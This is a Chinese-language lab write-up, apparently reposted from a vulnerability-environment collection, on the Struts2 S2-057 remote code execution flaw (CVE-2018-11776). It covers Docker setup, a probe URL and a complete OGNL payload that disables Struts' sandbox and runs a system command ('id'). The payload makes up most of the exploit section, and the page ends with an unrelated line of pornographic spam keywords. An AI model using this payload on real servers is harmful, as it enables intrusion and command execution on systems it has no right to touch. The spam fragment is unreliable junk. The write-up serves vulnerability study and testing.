<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Struts2 S2-057 遠程代碼執行漏洞 (CVE-2018-11776)

    Path struts2/s2-057

    • 影響版本: <= Struts 2.3.34, Struts 2.5.16

    參考:

    安裝

    啟動 Struts 2.3.34 環境:

    docker-compose up -d

    環境部署后, 觀察 http://your-ip:8080/showcase/ 你會看見 Struts2 測試頁.

    Exp

    S2-057 先決條件:

    • alwaysSelectFullNamespace 正確 - 操作元素未設置名稱空間屬性,或使用了通配符

    用戶將從uri傳遞命名空間,并將其解析為OGNL表達式,最終導致遠程代碼執行漏洞
    Payload:

    http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action

    可以看出,位置標頭中返回了233 * 233的結果。

    Use payload from S2-057 vulnerability analysis and POC:

    ${
    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

    結果:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类